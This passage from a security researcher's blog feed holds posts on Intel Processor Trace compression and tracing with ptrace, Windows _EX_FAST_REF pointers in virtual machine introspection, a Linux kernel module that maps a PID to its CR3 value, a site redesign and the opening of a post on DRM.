<img alt="Figure 2" src="https://carteryagemann.com/images/pt-at-rest-fig2.png">
</center></p>
<p>The next graph shows the relationship between the compressed and uncompressed
sizes as a <a href="https://en.wikipedia.org/wiki/Data_compression_ratio#Definitions">space savings</a>
percentage. The plot best fits a linear regression and shows the savings
decreasing over time. This is likely due to the design of the underlying
compression algorithm, which is intended for general use and does not take into
consideration the unique characteristics of PT traces.</p>
<p>To summarize, this experiment shows that more can be done to compress PT traces
for storage at rest.</p>
<h2>Discussion</h2>
<p>It is understandable that the compression used by PT would produce small space
savings compared to general compression algorithms given the limitations of
hardware memory and Intel's very strict performance overhead requirements. In practice,
PT produces an overhead of less than 4% in the worst case, and less
than 2% on average. These numbers are based on my own observations and the results
published by other researchers. In short, PT has very few clock cycles and very
little space available for performing compression.</p>
<p>Another factor that deserves consideration is compression's impact on processing
time. For systems that consume PT traces on the fly, the largest source of
performance overhead is not PT tracing itself but rather the time spent
buffering and consuming it. In CFI, for example, the PT trace has to be
matched with the executed code in order to reconstruct control-flow. This is why
the authors of
<a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Griffin</a>
report a 11.9% overhead on the SPECint benchmark despite the 4% overhead of PT itself.
Adding better space saving compression could increase this overhead further.</p>
<p>That said, for storing PT traces at rest, more can be done to better conserve space.</p>Windows _EX_FAST_REF Pointers and Virtual Machine Introspection2017-08-29T23:00:00-04:002017-08-29T23:00:00-04:00Carter Yagemanntag:carteryagemann.com,2017-08-29:/vmi-windows-fastref.html<p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI …</p><p>Last week I was working on a
<a href="https://github.com/carter-yagemann/vmi-unpack">VMI-based malware unpacker</a>
for Linux and Windows when I came across an interesting problem. I was trying
to implement a method that would, given a virtual address and process ID,
return the address range of the memory segment it belongs to using VMI.</p>
<p>Implementing this in Linux was no problem for me because it's the OS I'm
most familiar with. The
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/linux.c#L172">implementation</a>
boils down to getting the current process' <code>task_struct</code>, looking up the
pointer to it's memory mapping (<code>task_struct-&gt;mm</code>), and then iterating through its
linked list of virtual memory areas (<code>mm-&gt;mmap</code>) until a match is found. Pretty
straight forward.</p>
<p>Windows seemed a little tricker but very similar. The main difference is while
Linux uses a linked list of structures called virtual memory areas, Windows
uses structures called virtual address descriptors (VADs) linked into a
balanced binary tree. The procedure is fairly similar. Once the current executive
process (<code>_EPROCESS</code>) is located in memory, read its <code>VadRoot</code> pointer that, as the name implies,
points to the root of the binary tree of VADs and then check the VAD's memory range.
Lookup the left child if the range is too high, the right child if the range is too low,
and repeat until the desired VAD is located. A straightforward binary search.</p>
<p>So I implemented my VMI function, ran it, and to my surprise it failed. After
some debugging, I discovered that when the code read <code>VadRoot</code>, the pointer
would always be 3 bytes greater than the actual base virtual address of the root VAD. Here are
some examples of addresses that my code read for 64-bit Windows 7, printed in little-endian:</p>
<div class="highlight"><pre><span></span>1b 3c 90 02 80 fa ff ff
6b 3d 6a 02 80 fa ff ff
3b 69 8e 01 80 fa ff ff
</pre></div>
<p>Why are the 4 least significant bits always <code>0xb</code> and why was I only having
this problem with the <code>VadRoot</code> pointer and no other pointers? Stumped, I asked
my question to the
<a href="https://groups.google.com/forum/#!topic/vmitools/G4EVxAAE71c">libVMI forum</a>
and the developer of <a href="https://drakvuf.com/">DRAKVUF</a> kindly pointed out the
answer:
<em>the Windows kernel sometimes uses a special pointer called a <code>_EX_FAST_REF</code>.</em></p>
<p>If you take a look at the definition for this type, you will notice something
interesting:</p>
<div class="highlight"><pre><span></span><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_EX_FAST_REF</span>
<span class="p">{</span>
<span class="k">union</span>
<span class="p">{</span>
<span class="n">PVOID</span> <span class="n">Object</span><span class="p">;</span>
<span class="n">ULONG</span> <span class="nl">RefCnt</span><span class="p">:</span> <span class="mi">3</span><span class="p">;</span>
<span class="n">ULONG</span> <span class="n">Value</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">}</span> <span class="n">EX_FAST_REF</span><span class="p">,</span> <span class="o">*</span><span class="n">PEX_FAST_REF</span><span class="p">;</span>
</pre></div>
<p>As you can see, the Windows kernel uses the 3 least significant bits as a
reference counter. Therefore, in order to read this pointer correctly using
VMI, these bits need to be masked out after reading the pointer. Once I realized
such a pointer existed, the rest of the
<a href="https://github.com/carter-yagemann/vmi-unpack/tree/26974ca76505da11a35396dc70f888f374ec88f3/src/process/windows.c#L170">implementation</a>
was straightforward.</p>
<p>So there you have it. The Windows kernel sometimes uses a special pointer that
stashes a reference counter in the lower bits. Something to watch out for when
you're doing virtual machine introspection. Hopefully this blog post will save
others some time.</p>You never know where your code will end up.2017-07-28T16:30:00-04:002017-07-28T16:30:00-04:00Carter Yagemanntag:carteryagemann.com,2017-07-28:/bbs-4chan.html<p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
&gt;&gt;60943289
I&#39;m running it locally, but you can get it here:
https://github.com …</pre></div><p>I was searching through an archive site for 4Chan when I noticed that my name
was in a random post on the Technology board, /g/:</p>
<div class="highlight"><pre><span></span>Anonymous Sat Jun 17 11:13:54 2017 No.60943336
&gt;&gt;60943289
I&#39;m running it locally, but you can get it here:
https://github.com/carter-yagemann/4ChanBBS
It uses the official API to retrieve posts, and it even converts images to ASCII
</pre></div>
<p>The link is for a public repository I created on Github. It contains a proxy
server written in Python that allows computers to browse 4Chan via a telnet
connection using a command line interface (CLI) reminiscent of old-school
<a href="https://www.wikipedia.org/wiki/Bulletin_board_system">BBS</a> sites. I wrote it
in a few hours purely as a joke and then never touched it again. Everything
about it was intended as nothing more than a quick laugh, down to how it
crudely converts images into ASCII strings so they can be displayed in the
terminal. I didn't put much effort into the project and I assumed no one would
ever care.</p>
<p>But apparently someone did care and that someone owns a retro computer:</p>
<p><img alt="Retro IBM computer running 4Chan BBS" src="https://carteryagemann.com/images/1497712038601.jpg"></p>
<p>Seeing my code's banner page on a monitor old enough to be from the
days of BBS made my day. I don't know the person that posted this image,
but I'm happy to know someone found value in my forgotten code. It just
goes to show that you never know where your code will end up.</p>Intel Processor Trace, execvp, and ptrace2017-03-21T21:15:00-04:002017-03-21T21:15:00-04:00Carter Yagemanntag:carteryagemann.com,2017-03-21:/pt-execvp-ptrace.html<p>Lately, I've been playing around with Intel Processor Trace (PT); a x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model …</p><p>Lately, I've been playing around with Intel Processor Trace (PT); a x86
hardware feature that allows for complete tracing of process control flows.
As part of my research, I've been developing my own Linux driver and user
program to control PT.</p>
<p>Tracing can be configured using a handful of model specific registers (MSRs)
in the Intel CPU. One useful configuration supported by PT is CR3 filtering.
For those readers less familiar with x86 architecture, when a user process is
executed, the CPU's CR3 register holds the physical address of the process's
page table. Since every process has its own page table, each process will also
have a CR3 value that is unique from every other currently scheduled process.
By configuring PT to use a CR3 filter, tracing can be limited to a single
process.</p>
<p>Early versions of my program could only trace already running processes. I would
use the GNU debugger to start the target process and trap its first instruction
and then I would manually feed its PID into my program as an argument. The Linux
driver would then convert the PID into a CR3 by traversing the process's task
structure (<code>virt_to_phys(task_struct-&gt;mm_struct-&gt;pgd)</code>) and use this address to
configure PT (<code>IA32_RTIT_CR3_MATCH</code>). Needless to say, having to manually start
and trap the target process got very tiring after repeated tracing.</p>
<p>To simplify tracing a process, I wanted my program to take as parameters the
file path of an executable and its arguments and automatically start and trace
the process. My first attempt roughly followed this pseudo code:</p>
<div class="highlight"><pre><span></span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="c1">// Wait for parent to signal that PT is ready</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">target_program</span><span class="p">,</span> <span class="n">args</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// Parent process</span>
<span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="n">enable_pt</span><span class="p">();</span>
<span class="c1">// Signal child that PT is ready</span>
<span class="p">}</span>
</pre></div>
<p>Easy enough, right? I compiled the program, ran my first trace and got...
nothing.</p>
<h2>execvp and CR3</h2>
<p>So what went wrong? It turns out we can demonstrate the problem with a simple
test. Consider this simple C program:</p>
<div class="highlight"><pre><span></span><span class="c1">// test_1.c</span>
<span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"></span>
<span class="kt">void</span> <span class="nf">pid_to_cr3</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">m_pid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
<span class="kt">char</span> <span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="s">&quot;%d&quot;</span><span class="p">,</span> <span class="n">m_pid</span><span class="p">);</span>
<span class="kt">FILE</span> <span class="o">*</span> <span class="n">chardev</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&quot;/dev/pid_to_cr3&quot;</span><span class="p">,</span> <span class="s">&quot;w&quot;</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="n">chardev</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="s">&quot;./test_2&quot;</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">};</span>
<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="n">pid_to_cr3</span><span class="p">();</span> <span class="c1">// printed to dmesg</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">argv</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</pre></div>
<p>In this example, <code>/dev/pid_to_cr3</code> is a simple Linux character device that
processes can write a PID into and it will print the corresponding CR3 value
into the kernel log:</p>
<div class="highlight"><pre><span></span><span class="c1">// pid_to_cr3.c</span>
<span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="n">task</span> <span class="o">=</span> <span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span> <span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">((</span><span class="kt">uintptr_t</span><span class="p">)</span> <span class="n">task</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
<span class="c1">// mm can be NULL in cases such as kthreads, in which case we want the active_mm</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">active_mm</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">cr3_virt</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">pgd</span><span class="p">;</span>
<span class="k">return</span> <span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="p">}</span>
</pre></div>
<p>After <code>test_1.c</code> passes its PID to <code>/dev/pid_to_cr3</code>, it then uses <code>execvp</code> to
overwrite its memory with a new program: <code>test_2.c</code>. This program simply passes
its PID to <code>/dev/pid_to_cr3</code> as well:</p>
<div class="highlight"><pre><span></span><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"></span>
<span class="kt">void</span> <span class="nf">pid_to_cr3</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">int</span> <span class="n">m_pid</span> <span class="o">=</span> <span class="n">getpid</span><span class="p">();</span>
<span class="kt">char</span> <span class="n">pid_str</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">snprintf</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="s">&quot;%d&quot;</span><span class="p">,</span> <span class="n">m_pid</span><span class="p">);</span>
<span class="kt">FILE</span> <span class="o">*</span> <span class="n">chardev</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&quot;/dev/pid_to_cr3&quot;</span><span class="p">,</span> <span class="s">&quot;w&quot;</span><span class="p">);</span>
<span class="n">fputs</span><span class="p">(</span><span class="n">pid_str</span><span class="p">,</span> <span class="n">chardev</span><span class="p">);</span>
<span class="n">fclose</span><span class="p">(</span><span class="n">chardev</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="n">pid_to_cr3</span><span class="p">();</span> <span class="c1">// printed to dmesg</span>
<span class="p">}</span>
</pre></div>
<p>If we compile these source files and execute <code>test_1</code>, we expect that the PID
before and after executing <code>execvp</code> will be the same because <code>execvp</code> causes the
kernel to overwrite the caller's own memory. But what happens to the CR3 value?
As it turns out:</p>
<div class="highlight"><pre><span></span>[ 1757.437572] PID 17319 = CR3 18759503872
[ 1757.438414] PID 17319 = CR3 18826612736
</pre></div>
<p>Rather than rewriting the existing caller's page table when <code>execvp</code> is called,
the Linux kernel actually allocates and populates an entirely new page table!
Since our original PT program was getting the CR3 <em>before</em> the <code>execvp</code>, our
trace wasn't including the target program's execution.</p>
<h2>ptrace</h2>
<p>So how do we get the CR3 value <em>after</em> <code>execvp</code> is called by the child? We can't
simply have the parent signal the child, like in the first attempt, because any
code we give to the child process will be overwritten when <code>execvp</code> is called.
The solution instead lies in an OS feature known as <code>ptrace</code>. Using <code>ptrace</code>, we
can have the child process attach itself to the parent process for debugging.
When <code>execvp</code> is completed, the OS will pause the child and signal the parent.
The parent can catch this signal using <code>waitpid()</code>, do whatever it needs to do,
and then resume the child. The code looks something like this:</p>
<div class="highlight"><pre><span></span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">()</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Child process</span>
<span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_TRACEME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="n">execvp</span><span class="p">(</span><span class="n">args</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">args</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// Parent process</span>
<span class="n">waitpid</span><span class="p">(</span><span class="n">pid</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Wait for child to complete execvp()</span>
<span class="n">enable_cr3_filter</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span>
<span class="n">enable_pt</span><span class="p">();</span>
<span class="n">ptrace</span><span class="p">(</span><span class="n">PTRACE_DETACH</span><span class="p">,</span> <span class="n">pid</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> <span class="c1">// Resume child</span>
<span class="p">}</span>
</pre></div>
<p>Note that this code detaches the parent from the child once the child has been
paused. This causes the child to resume normal execution. If we wanted to
continue monitoring the child (for example, to detect <code>fork()</code> or <code>clone()</code>), we
could do so.</p>
<p>Making the above modification allows the parent to capture the correct CR3 value
and get a complete PT trace.</p>Of Fancy Bears and Men: Attribution in Cybersecurity2017-03-09T22:30:00-05:002017-03-09T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-03-09:/of-fancy-bears-and-men.html<p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p><p>I wrote a guest blog post for Georgia Tech's Internet Governance Project (IGP)
on the topic of attack attribution. You can read the post here:
<a href="http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/">http://www.internetgovernance.org/2017/03/09/of-fancy-bears-and-men-attribution-in-cybersecurity/</a></p>Getting the CR3 value for a PID in Linux2017-01-30T20:30:00-05:002017-01-30T20:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-30:/pid-to-cr3.html<p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000 page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot …</p><p>Writing low level code can be difficult due to the lack of examples on the internet.
The answer is generally sitting somewhere in a 3,000 page manual where only the most dedicated programmers will find it.</p>
<p>Last week I had such an experience. Currently my research involves a lot of x86 specific programming and virtual machine introspection (VMI).
To test one of the proof-of-concept hypervisors I'm working on, I needed a way to quickly convert Linux PID values into the corresponding
value that gets loaded into the CR3 register when that process is executing on the CPU. For those who are unfamiliar with the x86 CPU architecture,
I recommend reading <a href="https://www.kernel.org/doc/gorman/html/understand/understand006.html">this page</a> on Linux x86 page table management.
The short story is when a process is executed on an x86 CPU, the CR3 register is loaded with the <em>physical</em> address of that process's
<em>page global directory</em> (PGD).
This is necessary so the CPU can perform translations from virtual memory address to physical memory addresses.
Since every process needs its own PGD, the value in the CR3 register will be unique for each scheduled process in the system.
This is very convenient for VMI because it means we don't need to constantly scan the guest kernel's memory to keep track of which process is
being executed. Instead, we can just monitor writes to the CR3 register.</p>
<p>However, just tracking changes to the CR3 register doesn't give us much insight into what the guest kernel is doing.
This is commonly referred to as the <em>semantic gap</em> problem. In order to cross this gap, we need to map the PID values of the processes we're interested
in to their corresponding CR3 values. The following Linux kernel module code snippet does just that:</p>
<div class="highlight"><pre><span></span><span class="cp">#include</span> <span class="cpf">&lt;linux/module.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/sched.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;linux/pid.h&gt;</span><span class="cp"></span>
<span class="cp">#include</span> <span class="cpf">&lt;asm/io.h&gt;</span><span class="cp"></span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="nf">pid_to_cr3</span><span class="p">(</span><span class="kt">int</span> <span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">task_struct</span> <span class="o">*</span><span class="n">task</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">mm_struct</span> <span class="o">*</span><span class="n">mm</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">cr3_virt</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cr3_phys</span><span class="p">;</span>
<span class="n">task</span> <span class="o">=</span> <span class="n">pid_task</span><span class="p">(</span><span class="n">find_vpid</span><span class="p">(</span><span class="n">pid</span><span class="p">),</span> <span class="n">PIDTYPE_PID</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">task</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// pid has no task_struct</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">mm</span><span class="p">;</span>
<span class="c1">// mm can be NULL in some rare cases (e.g. kthreads)</span>
<span class="c1">// when this happens, we should check active_mm</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">mm</span> <span class="o">=</span> <span class="n">task</span><span class="o">-&gt;</span><span class="n">active_mm</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">mm</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// this shouldn&#39;t happen, but just in case</span>
<span class="n">cr3_virt</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">)</span> <span class="n">mm</span><span class="o">-&gt;</span><span class="n">pgd</span><span class="p">;</span>
<span class="n">cr3_phys</span> <span class="o">=</span> <span class="n">virt_to_phys</span><span class="p">(</span><span class="n">cr3_virt</span><span class="p">);</span>
<span class="k">return</span> <span class="n">cr3_phys</span><span class="p">;</span>
<span class="p">}</span>
</pre></div>
<p>It should be noted that while the CR3 register is useful for tracking which <em>process</em> is being executed, it cannot track which <em>thread</em> is executing
because threads share memory and therefore will have the same PGD and CR3 value. Keeping track of the scheduling of threads via introspection is
a more complicated task and is a topic for another time.</p>
<p>For simplicity I implemented the conversion code as a Linux kernel module. If you're interested in how to do this conversion using pure introspection
on an unmodified kernel, you should checkout <a href="https://github.com/libvmi/libvmi/blob/master/libvmi/os/linux/memory.c#L145">libVMI's code</a>.</p>Site Redesign2017-01-24T19:20:00-05:002017-01-24T19:20:00-05:00Carter Yagemanntag:carteryagemann.com,2017-01-24:/move-to-pelican.html<h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career; an eye catch for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not …</p><h2>HTML5Up</h2>
<p>When I originally registered the domain carteryagemann.com I imagined it would be a single static page summarizing my professional career; an eye catch for recruiters
and peers searching my name on the internet. I wanted a place for bragging that I would have complete control over and not be restricted by the cookie-cutter molds set by
social networking sites. A few months later I was asked to write blog articles for Syracuse University's engineering college and suddenly my website was no longer a sole
page. As much as I liked my <a href="https://html5up.net/">HTML5Up</a> design, I needed new templates. I also have to admit that the JavaScript my site originally used was slow at
times.</p>
<h2>AMP HTML</h2>
<p>I always liked the idea of fast and efficient web pages, especially when those web pages are being served at my expense. I wanted to stay with static pages for two main
reasons. First, static pages are cheaper and easier to host and cache. Second, static pages pose little attack surface. The last thing I wanted as a security professional
was for a site with my name on it to get compromised because I only look at it twice a year.</p>
<p>I was browsing around for platforms to build my new site on when I heard about this thing Google was working on called <a href="https://www.ampproject.org/learn/about-amp/">AMP HTML</a>.
What drew me in was their promise of a fast user experience and a specification designed for being cached. Google was going to cache and prioritize search results for AMP
HTML pages and even social networks like <a href="https://www.ampproject.org/learn/about-amp/">Twitter</a> announced plans to implement AMP HTML caching servers. All this meant free
bandwidth and geographically distributed caching for my humble site. Perfect.</p>
<p>Sadly, about a year after I reworked my entire site to run on AMP HTML (I had even visually designed it based on
<a href="https://material.io/guidelines/material-design/introduction.html">Material Design</a>), I realized my decision was not the best. More accurately, my work in security brought
me into contact with more privacy-minded people and over time I came to adopt their mindset. I stopped seeing AMP HTML as an open source project and became hung up on the
company that sat behind it. A company that over the years has pushed a narrative in cyberspace aimed at destroying privacy with promises of convenience while hiding its
true goal of making money by knowing as much about people as legally (not ethically) possible. As the now famous saying goes:</p>
<blockquote>
<p>If you're not paying for it; you're the product.</p>
</blockquote>
<p>There were also three other reasons for my dissatisfaction with AMP HTML:</p>
<h3>Mandatory JavaScript</h3>
<p>As someone who values security and privacy, I try my best to make websites that are functional even when the user disables active content (JavaScript, Flash, etc.).
If a site wants to use JavaScript to make some parts prettier (e.g. syntax highlighting code) or save bandwidth (e.g. AJAX), that's fine. On the other hand, I find it very
rude and unethical when a site won't even display a single image or line of text until the user executes JavaScript from 30+ sources (news sites are particularly notorious
for this). JavaScript is code, code can be malicious or invasive (e.g. JavaScript exploit kits for installing ransomware), and just like how I wouldn't hand someone I just
met a self-signed Windows executable and ask them to run it, a user shouldn't be forced to execute JavaScript upfront just to see what the site is about. This is even more
true when that JavaScript is heavily compressed and obfuscated.</p>
<h3>In-line CSS</h3>
<p>In order for AMP pages to be easily cached, the specification requires that all CSS be embedded directly in the HTML. This quickly becomes a problem when you have multiple
web pages and you want to adjust your site's theme. Writing all the pages by hand turned out to be a major mistake that lead to inconsistent formatting and unnecessary
work.</p>
<h3>Public Opinion</h3>
<p>People, especially those with technical background, are becoming more conscious of the importance of privacy and security and more weary of the power wielded by major tech
companies. Even the tech enthusiasts that buy into the mantra of "nothing to hide" have become more cautious of walled gardens that try to lock the user in. The result is
<a href="https://tech.slashdot.org/story/17/01/18/1455259/the-problem-with-google-amp">negativity towards the AMP HTML platform</a>.</p>
<p>Additionally, as the AMP HTML specification evolves, people both on the <a href="https://stackoverflow.com/questions/41823700/amp-cache-not-getting-removed">technical</a> and
<a href="http://searchengineland.com/google-amp-display-publishers-urls-265945">nontechnical</a> sides are becoming confused.</p>
<p>In response to all these points, I decided it was time to move to a different platform for managing my website.</p>
<h2>Pelican</h2>
<p>For my new site I still wanted static pages for their cheap hosting, easy caching, and security, but I also wanted a way to be able to write my content in a high level
language and have a program automate compilation and deployment. This isn't a new idea by any stretch, so I knew there had to be good tools readily available. After
looking at what the blogs I read were using and hearing a few recommendations, I decided to go with <a href="https://blog.getpelican.com/">Pelican</a>. For those of you who want to
statically host blogs, I highly recommend it. The learning curve is manageable and the tools are very comfortable for technical people who already prefer command lines.
Pages and articles can be written in <a href="https://en.wikipedia.org/wiki/Markdown">Markdown</a>, which should be familiar to anyone who stores code in git repositories.
There are also plenty of free and publicly available <a href="http://www.pelicanthemes.com/">themes</a>, including the one I'm using for the site
<a href="https://github.com/nairobilug/pelican-alchemy/">right now</a>. I'll stop there before I start to sound like a salesman.</p>
<p>However, while I'm on the topic of plugging software I like, I will also give a quick mention to <a href="https://wummel.github.io/linkchecker/">linkchecker</a>, which I used to find
and fix a few links in my past articles to external sites that no longer exist.</p>
<p>So there you have it. The site now runs on Pelican, I like it very much, and hopefully the considerations I listed here will give you ideas to think about.</p>The Problem with DRM2016-10-22T22:30:00-04:002016-10-22T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2016-10-22:/drm-problem.html<h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open …</p><h2>Preamble</h2>
<p>The topic of digital rights management (DRM) systems is a controversial one among those affected by it. Some readers are going to jump to conclusions without properly reading what I want to write on the matter and there's nothing I can do about that. To those with minds open enough to read this entire blog post honestly, I promise to present you with a perspective that, although not novel to everyone, isn't a rehash of the most common arguments made on the topic. What I will argue is a stance based on my technical understanding of computer systems as an information security researchers, which I believe is a perspective many aren't exposed to. If by chance you happen to be such a researcher, you probably won't find this post particularly interesting. For everyone else I hope to present a robust formulation of the problem that is insightful while still being easy to understand.</p>
<p>Additionally, as is necessary when discussing controversial topics, I must state that the contents of this post are my personal opinions and mine alone.</p>
<h2>Motivation</h2>
<p>DRM has become an active topic of debate in multiple communities due to recent changes in how technology allows us to access and experience digital content; such as movies, shows, games, and music. With the decline in users buying and storing their own digital content in favor of services (Netflix, Hulu, Steam, Spotify, etc.) that offer to stream it over the internet on-demand, DRM touches more lives now than ever before.</p>
<p>For users of these services the benefits of not having to think about storage and having cheap and immediate access to the latest content are very appealing. Try to access content from even a year ago however and the trade-off becomes apparent. These services may be cheaper, but they also don't guarantee lifetime access as licenses change and budgets require <a href="https://news.slashdot.org/story/16/10/12/2011240/netflix-now-only-has-31-movies-from-imdbs-top-250-list">money saving cuts</a>. As some users have been frustrated to realize, there's a difference between paying to access and paying to own. Adding to the frustration is the inability to access content on some services when an internet connection is slow or unavailable.</p>
